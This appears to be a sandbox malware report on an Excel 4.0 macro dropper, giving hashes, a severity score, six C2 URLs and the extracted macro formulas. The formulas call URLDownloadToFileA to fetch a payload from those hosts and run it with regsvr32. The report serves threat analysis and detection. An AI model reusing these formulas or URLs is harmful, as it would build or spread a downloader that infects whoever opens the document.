General

  • Target

    c47dca0047a073cf00f6c22625be58ffb7b1b346a2cd348ff30e125bcaddc115

  • Size

    46KB

  • Sample

    241119-xlds6szfjh

  • MD5

    fc250cc4157fb4e6c8d65117fd01ceac

  • SHA1

    896c8920c9dc84fc3ce7df3c6e59469ae690d123

  • SHA256

    c47dca0047a073cf00f6c22625be58ffb7b1b346a2cd348ff30e125bcaddc115

  • SHA512

    0655a63955bdac2d481b1e45f6dd4b876309fe0d5d9a0cd309017d03fb4a79b15544b619d7087cd3504b04d43a11d7c261b23ff819f08d370ba45aa2724a750c

  • SSDEEP

    768:wdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:WoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gymsportive.com/0zwe/pSiUh/

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/

http://totalplaytuxtla.com/sitio/IduhreKcPbD/

http://skanev.com/wp-content/AT5Doj207guJES0BMk/

http://praachichemfood.com/old-files==-/vo68ZI/

http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gymsportive.com/0zwe/pSiUh/

xlm40.dropper

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/

xlm40.dropper

http://totalplaytuxtla.com/sitio/IduhreKcPbD/

xlm40.dropper

http://skanev.com/wp-content/AT5Doj207guJES0BMk/

xlm40.dropper

http://praachichemfood.com/old-files==-/vo68ZI/

Targets

    • Target

      c47dca0047a073cf00f6c22625be58ffb7b1b346a2cd348ff30e125bcaddc115

    • Size

      46KB

    • MD5

      fc250cc4157fb4e6c8d65117fd01ceac

    • SHA1

      896c8920c9dc84fc3ce7df3c6e59469ae690d123

    • SHA256

      c47dca0047a073cf00f6c22625be58ffb7b1b346a2cd348ff30e125bcaddc115

    • SHA512

      0655a63955bdac2d481b1e45f6dd4b876309fe0d5d9a0cd309017d03fb4a79b15544b619d7087cd3504b04d43a11d7c261b23ff819f08d370ba45aa2724a750c

    • SSDEEP

      768:wdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:WoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks